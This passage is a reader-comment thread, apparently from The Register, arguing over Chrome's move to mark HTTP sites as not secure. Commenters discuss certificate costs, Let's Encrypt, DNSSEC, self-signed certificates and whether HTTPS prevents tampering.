    All the advertising malware, all the malware in Google Play Store, all the cheap certificates that don't declare an owner, and all the server-side break-ins hardly make HTTPS a cure for anything. About all it's good for is preventing US ISPs from injecting more ads, malware, and trackers.

    1. tom dial Silver badge

      Re: Certified authentic malware

      "[P]reventing US ISPs from injecting more ads, malware, and trackers." That would seem a good enough thing by itself, although because I run an ad blocker I am not sure how much it is a real problem at present.

  21. Craig100

    Shared hosting licking their lips

    I'm with the guys who say not all sites need HTTPS. It's all very well if you're running your own servers or VM's but shared hosting ISPs charge a fortune for certs and hardly any use Let's Encrypt. Why would they when they'd lose so much money. A few of my client's are micro-businesses or charities and wouldn't stand the extra costs. They're on share hosting cos it's cheap.

    Google should pull it's neck in. All for security where it's needed, otherwise, piss off!

    1. SImon Hobson Silver badge

      Re: Shared hosting licking their lips

      Exactly.

      At present, one of my sites (purely informational, completely static) is hosted under my own domain name using hosting that's bundled with my internet connection. They don't offer the option of hosting the same site with SSL unless I host it as something like "sharedhosting.isp.tld/myaccountname". SO to go SSL I would need to pay to host it somewhere else - so stuff you all those "but SSL is free" id10ts.

      More annoyingly, the fact that it seems browsers and search engines are pushing users to the SSL enabled site that isn't - means that users (correctly) get a certificate error, and they they continue past that then they get the ISPs generic sales page and not my site.

      And where I used to work, we used one of the larger UK based hosting outfits for customer sites, and no they didn't support LetsEncrypt - IIRC it was something like an extra £30/year for an SSL cert on your site.

      IME most small sites are on shared hosting. IME a lot of hosting outfits do not offer free or very cheap SSL certs. Yes, there is a real £££ (or $$$ or €€€ or ...) cost in going SSL for a great many site owners.

  22. Anonymous Coward
    Anonymous Coward

    Money talks...

    Why do we need those dumb CA's anyway? Heck: why do we need to pay for all this?

    Why can't I have a DNS record which shares my public key and which is used to encrypt and verify my website running on the same domain? How direct can it get? In order to abuse this you'd need to have access to both the domain registration and the physical website.

    Best of all: this would also allow average Joe to use his own set of keys because the only important link is between DNS security record and the website itself.

    No: SSL isn't free for everyone. Not everyone has the know how about the underlying mechanic and all which Googles narcissistic policy does is provide a platform for some hosting providers to generate even more revenue. While the alleged "enhanced security" is seriously disputable.

    1. Kanhef

      Re: Money talks...

      What happens if and when someone is able to hijack the DNS record? By changing the public key, they can redirect traffic to a site they control which will be 'verified' as the real thing. Putting both address and authentication information in the same record creates a single point of failure.

      1. Drew 11

        Re: Money talks...

        Errr, if someone is able to hijack your DNS record, then no amount of security is going to help you.

    2. Drew 11

      Re: Money talks...

      Errrr, you CAN have a DNS record that shares your public key. It's called DNSSEC and it's running right now.

      I have it all set up, but browser's still complain because DANE isn't baked in because the big browser owners don't want to lose control.

      ICANN and their SSAC should be complaining loudly but they're too busy feathering their own nests with the very browser writers that are the problem. Allegedly.

    3. Anonymous Coward
      Anonymous Coward

      Re: Money talks...

      "Why can't I have a DNS record which shares my public key and which is used to encrypt and verify my website running on the same domain? How direct can it get? In order to abuse this you'd need to have access to both the domain registration and the physical website."

      That wouldn't work, your site can then be redirected and would appear legit as it would only require the dns server to be compromised by anyone, this includes any isp dns or 3rd party in the chain. They can then set the site ip and public key to anything they like and your users wouldn't know any different.

  23. tekHedd

    Not about encryption

    The dangers of unencrypted transmissions? Sure it's real, but no, that's not a problem that is solved by this move. The real end result of this move is the death of self-signed certs.

    Why does Google hate self-signed certs?

    1. Kanhef

      Re: Not about encryption

      Because they're worse than useless: they make a site look secure, but don't actually make it any more secure than an HTTP-only site. Anyone can write a self-signed cert for any domain, so MITM attacks are easy: the attacker just makes their own self-signed cert, and it looks just as valid as the original.

      1. Drew 11

        Re: Not about encryption

        Not if the domain is running DNSSEC.

  24. DCFusor Silver badge

    hmmm

    Noticing that what seems like a majority of those saying "just do it" are AC. That's interesting, wonder who they really are and why they think they have to be AC?

    For the guy who says someone doesn't know how crypto works - do you check your keys for the right primality properties yourself? Maybe you're the one who doesn't know the subject well enough.

  25. Camilla Smythe
    IT Angle

    Um-Kay

    Let me just do that for my raspberry pi.

    https://letsencrypt.org/getting-started/

    Looks like I need Certbot for Debian Stretch...

    https://certbot.eff.org/lets-encrypt/debianstretch-apache

    Err... need to do something about backports...

    https://backports.debian.org/Instructions/

    Now we have to Dick about with 'clarity' of the instructions. Dick Dick Dick..

    sudo apt-get update

    Reading package lists... Done

    W: GPG error: http://ftp.debian.org/debian stretch-backports InRelease: The following signatures couldn't be verified because the public key is not available: NO_PUBKEY 8B48AD6246925553 NO_PUBKEY 7638D0442B90D010

    W: The repository 'http://ftp.debian.org/debian stretch-backports InRelease' is not signed.

    N: Data from such a repository can't be authenticated and is therefore potentially dangerous to use.

    N: See apt-secure(8) manpage for repository creation and user configuration details.

    Looks like that is fucked then.

    LetsEncrypt - - - - LetsNotBother

    ... and don't give me no PEBCAK.

    I worked out your stupid instructions and it fell over.

    ... and don't tell me the fault lies with Debian or RPi

    If you tell me to use someone else's shit to use your shit you better make sure the other shit works with your shit,,, and my shit.

    You may consider this to be my bug report.

    FFS. Falls over on a Public Key Error.

    1. Anonymous Coward
      Anonymous Coward

      Re: Um-Kay

      man apt-secure

      Looks like you need to install the repository key. The exact command to do so is left as an exercise for the reader, but there are at least two correct solutions.

      RTFM.

      PEBCAK.

      1. Camilla Smythe

        Re: Um-Kay

        Looks like you need to install the repository key. The exact command to do so is left as an exercise for the reader.

        And that just about sums your fuck up.

  26. Dabbb Bronze badge

    It's all about ads

    Does anyone really believe Google has some good intentions ? Don't anyone remember how they make their money ?

    First you can't cut ads on a proxy because of HTTPS, later they ban adblockers in Chrome. That's what Microsoft did when they put updates and tracking servers to same IPs so you can't block one without blocking another.

  27. G.Y.

    gateways

    https: gets mad when I have to log on to a gateway (e.g. Starbucks) to get on the internet. I learnt to use http://xxxx.com to get to their login. (Use to use xxx.com, but one place came back with "why this porn site??")

  28. Astara

    HTTPS everywhere benefits google ensuring you download their ads

    The main beneficial of HTTPS everywhere (given that anyone who cares about security will likely be breaking the encryption via MITM certs) is Google.

    It used to be that I could store about 20% of web requests (by request or byte count...varied, but averaged out the same), locally. On some sites, that would hit 40% -- but with HTTPS -- it falls to zero. because individual requests can no longer be seen or stored.

    This means good adverts that refresh each time you fetch them can be fresh each time, or all those wizzy scripts and icons... fresh each time...and it does slow things down -- house mate noticed a 50% boost in his youtube browsing with it caching all of the video icons... (not all of us are on google fiber even if it was offered in any significant market percentage)... I've never had to worry about someone altering my web pages in transit. Now -- even if you have an ad blocker -- many thing will still get downloaded before they are blocked (some won't), but so many things like fonts on every page are fairly constant as are many images and could be cached if not encrypted.

    So HTTPS everywhere is helping google more than anyone else. Security my bum!

    1. Anonymous Coward
      Anonymous Coward

      Re: HTTPS everywhere benefits google ensuring you download their ads

      What on earth are you on about? HTTPS can be cached just the same as HTTP!

      And what on earth does "a 50% boost in his youtube browsing" mean? The size of anything on YouTube that is able to be cached is going to be significantly smaller than a number of videos being watched.

      And lastly, youtube.com will default to HTTPS so your comment about caching on YouTube neatly contradicts your comment about HTTPS requests "can no longer be seen or stored".

  29. david 12 Bronze badge

    8 bit web devices on private network.

    8 bit devices means the largest block of memory I can handle is 256 bytes, and the total memory I have is actually 2K. Which isn't enough to handle 256 bit encryption, let alone 4Kbit encryption keys.

    I don't mind so much at home -- I've got service fast enough to handle the advertising download -- but for work this sucks donkey balls. And I've got 3rd world clients with 10yr-old PC's and 5yr-old phones.

  30. Tony W

    After all that fuss ...

    All you see is a little "i" in a circle. I noticed it only because I was looking for it.

    It's still nonsense, as when I clicked on the symbol I was told not to enter a password in my BT router. How can I control it without a password? I supose all such equipment will have to have secure connections in future, with extra cost for certificate renewal and dreadful warnings when they get it wrong.

    But phishing sites will get the green padlock of approval (with a nice free cert from Letsencrypt). Anyone who notices will get a false sense of security.

  31. EastFinchleyite

    Self Signed Certificates

    I run both FTP and Web servers on my home PCs for personal use and have hidden them behind obscure ports and have strong password protection. On both I use self signed certificates.

    That is good enough for me. If it is not good enough for Google then screw them, there are other browsers out there.

  32. Sleep deprived
    Unhappy

    Not so simple

    I have a small static HTML page from which users can download my freeware. No forms, no e-commerce. My ISP gave me an early warning of the upcoming Google's handling of http traffic, so following their help page, I got a LetsEncrypt certificate, added an .htaccess file to redirect traffic to https, and then my webpage went blank due to "mixed content" where my webpage has http references to outside articles, etc. Not much I could do about that, so I just reverted to http.

  33. Cavanuk

    Some years ago, I worked for a government agency that had an informational website that didn't require login and so was not HTTPS. Someone started intercepting our pages so that the page visitors saw was not what we were hosting. The interception took the form of the text "(a**hole!)" being inserted after the name of every senior staff member. Switching to HTTPS solved the problem.

    The purpose of HTTPS is not solely to encrypt data so that bad actors can't see your password. It tells your browser that you are communicating with the entity you think you're communicating with. It prevents tampering with the data in transit.

    1. Anonymous Coward
      Anonymous Coward

      Have an upvote. A good example of why the "nothing to hide, nothing to fear" logic isn't particularly useful in this discussion.

      Though I wish I could also give an upvote to whoever tampered with your government website in transit... that was a top effort.

  34. Anonymous Coward
    Anonymous Coward

    HTTPS will never prevent the middle men....

    Not only do browsers and search bots favor HTTPS sites, it prevents your pages being tampered with while in transit

    What a lying post. Anyone who doesn't think they can get a signed certificate into squid that the other computers just see as a wildcard for the whole internet is not doing what I am doing. HTTPS is fully capable of being used through a proxy and the ignorance of this just allows me to be a middle man without you folks ever suspecting. Thank you for the freedom for me to continue to do this.

    1. Anonymous Coward
      Anonymous Coward

      Re: HTTPS will never prevent the middle men....

      Don't you also have to get your wildcart cert included in the trusted CA list of any browser that forwards traffic via your squid, else the users see "not secure" flags in the address bar? Relatively easy if you control the clients (i.e. you're doing this for the purpose of corporate URL monitoring/antivirus etc), but not trivial if you're trying to compromise client machines you don't own.

  35. Compression Artifact

    I just spoke with tech support at the web host I use for my personal site, which is just a couple of trivial HTML pages I upload with an FTP client. They said they only support https at their grade of service that is two price tiers more expensive than anyone would use for a personal site. The additional ongoing cost would be over $300 per year. I think I'll pass on it.

    1. Anonymous Coward
      Anonymous Coward

      @ Compression Artifact: As we said, find a less shit web host.

      The web host I use costs about 1/4 of the “extra” cost that your host wants to charge you, and provides LetsEncrypt certs for free, at the literal (one time) click of a control panel button.

      At that sort of extra cost, we have to wonder what else your host is charging you uncompetitive prices for?

  36. Anonymous Coward
    Anonymous Coward

    "Noticing that what seems like a majority of those saying "just do it" are AC. That's interesting, wonder who they really are and why they think they have to be AC?"

    For me it's because work for the NSA/MI5/web hosting/CA spying conglomerates and my username says so, didn't want to show my ulterior motives.

    Damn it, gave it away

  37. Nematode

    "Although Chrome is the first mainstream browser to affix high-visibility warnings system to non-HTTPS websites"

    Huh? Firefox has been doing this for yonks

  38. iwrconsultancy

    Cartel situation.

    SSL/HTTPS is supposed to protect high importance sites, and when used correctly, it does so.

    The mass rollout compromises its ability to protect high importance sites.

    We already have a situation with Let's Encrypt, where a fraudster can very easily create a spoof site with a padlock, something which would have been difficult when that required a proper certificate involving human checking of the request. Thus, the value of SSL as an indicator of safety on banking sites has been seriously degraded.

    That, and on sites with advertising, HTTPS does NOT prevent MITM attacks, because any advertiser can inject a keylogger into the browser. Guess who serves most of the advertising? Yep, the same corporation pushing universal HTTPS.

    Perhaps worst though, is the blaze of propaganda that's been put around hyping SSL as a 'miracle cure' for IT security. This is no less than snake oil selling. SSL has its uses, as does snake oil (it's actually for rubbing on sore feet) Neither is a cure-all though, and by convincing people that it will offer blanket protection it will lead to other more effective protective measures being dropped. That will be bad. It will result in people being hit by ransomware, etc when they otherwise might have taken effective precautions.

    Our analysis:

    https://iwrconsultancy.co.uk/blog/https

POST COMMENT House rules

Not a member of The Register? Create a new account here.

  • Enter your comment

  • Add an icon

Anonymous cowards cannot choose their icon

Biting the hand that feeds IT © 1998–2019